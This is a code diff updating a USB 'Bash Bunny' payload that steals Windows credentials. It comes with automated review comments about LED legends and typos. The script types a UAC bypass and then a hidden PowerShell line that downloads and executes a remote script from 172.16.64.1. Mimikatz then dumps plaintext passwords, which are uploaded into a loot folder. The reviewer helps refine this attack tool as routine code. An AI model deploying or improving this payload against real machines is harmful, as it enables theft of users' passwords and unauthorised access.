diff --git a/payloads/library/credentials/MrRobot/payload.txt b/payloads/library/credentials/MrRobot/payload.txt
index 6cb6b425..4b4e398a 100644
--- a/payloads/library/credentials/MrRobot/payload.txt
+++ b/payloads/library/credentials/MrRobot/payload.txt
@@ -1,53 +1,48 @@
 #!/bin/bash
 #
 # Title: MrRobot Mimikatz Attack
-# Author: illwill
+# Author: illwill, El3ct71k
 # Version: 0.2
 #
 # Dumps the usernames & plaintext passwords from Windows boxes using Powershell in memory
 # with Mimikatz then stashes them in /root/udisk/loot/MrRobot
 #
-# Blue...............Running Powershell / Waiting for WebServer to start
-# White..............WebServer started and Uploading Results
-# Purple.............Checking for Results
+# Purple......................Setup
+# Yellow single blink.........Running Powershell / Waiting for WebServer to start
+# Yellow double blink.........Waiting for server connection and uploading results
+# Cyan inverted single blink..Starts ethenet attack
+# Cyan inverted double blink..Starts server to gets results
 # Green..............Got Creds and copied to loot folder
-# Amber(Blinking)....Mimikatz Error (Not Admin?)
 # Red................No Creds
-
-source bunny_helpers.sh
-
-LED R G 200
+LED SETUP
 # Creating Loot Folders
 LOOTDIR=/root/udisk/loot/MrRobot
 mkdir -p $LOOTDIR
 SWITCHDIR=/root/udisk/payloads/$SWITCH_POSITION
 mkdir -p $SWITCHDIR/loot
-LED B 200
 # HID Attack Starts
 ATTACKMODE HID
-
+DUCKY_LANG us
 # UAC Bypass
-Q GUI r
-Q STRING powershell -c "Start-Process cmd -verb runas"
+LED STAGE1
+RUN WIN powershell -c "Start-Process cmd -verb runas"
+Q DELAY 250
 Q ENTER
-Q DELAY 1000
+Q DELAY 1500
 Q LEFTARROW
 Q DELAY 500
 Q ENTER
 Q DELAY 1500
+LED STAGE2
 #Powershell Payload: first wait for connection to bunny webserver, then pull scripts and upload results
 Q STRING "powershell -W Hidden \"while (\$true) {If (Test-Connection 172.16.64.1 -count 1) {IEX (New-Object Net.WebClient).DownloadString('http://172.16.64.1/p.ps1');exit}}\""
 Q DELAY 300
 Q ENTER
-
-
 # Ethernet Attack Starts
 ATTACKMODE RNDIS_ETHERNET
-source bunny_helpers.sh
-
-LED R G B 200
+LED SPECIAL1
 # mount -o sync /dev/nandf /root/udisk
 iptables -A OUTPUT -p udp --dport 53 -j DROP
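Review bot: The rewritten LED legend in the header no longer matches the states the body signals: the last two legend lines still read `# Green..............Got Creds and copied to loot folder` and `# Red................No Creds`, while the body now emits `LED FINISH` and `LED FAIL` (second hunk), and the removed `Amber(Blinking)....Mimikatz Error (Not Admin?)` line described the `grep -q "ERROR kuhl_m_sekurlsa_acquireLSA"` branch, which still exists and now also emits `LED FAIL`, so the legend no longer distinguishes a Mimikatz error from an empty loot directory. The two new legend lines also carry typos; I would write `# Cyan inverted single blink..Starts Ethernet attack` and `# Cyan inverted double blink..Starts server to get results`. Dropping both `source bunny_helpers.sh` lines while introducing `LED SETUP`, `DUCKY_LANG` and `RUN WIN` presumably relies on a firmware that provides these natively; stating the required firmware version in the header would document that assumption.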
@@ -55,22 +50,22 @@ python $SWITCHDIR/server.py #Wait for EOF in loot folder -LED R B 200 +LED SPECIAL2 while [ ! -e "$SWITCHDIR/loot/EOF" ]; do sleep 1; done; sleep 1 -# check for empty loot directory, then check results and move them to loot +# check for empty lootddd directory, then check results and move them to loot if [ "$(ls -A $SWITCHDIR/loot/)" ]; then if grep -q "ERROR kuhl_m_sekurlsa_acquireLSA" $SWITCHDIR/loot/*.txt; then - LED G R 200 + LED FAIL mv -v $SWITCHDIR/loot/*.txt $LOOTDIR rm -rf $SWITCHDIR/loot/ else mv -v $SWITCHDIR/loot/*.txt $LOOTDIR rm -rf $SWITCHDIR/loot/ - LED G + LED FINISH fi else - rm-rf $SWITCHDIR/loot/ - LED R + rm -rf $SWITCHDIR/loot/ + LED FAIL fi
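Review bot: The rewritten comment above the `if` introduces a typo, `lootddd`, that the original line did not have; it should read `# check for empty loot directory, then check results and move them to loot`. The `rm -rf` spelling fix in the else branch is correct, but that branch now signals the same `LED FAIL` as the Mimikatz-error branch above it, which is the legend mismatch raised on the first hunk.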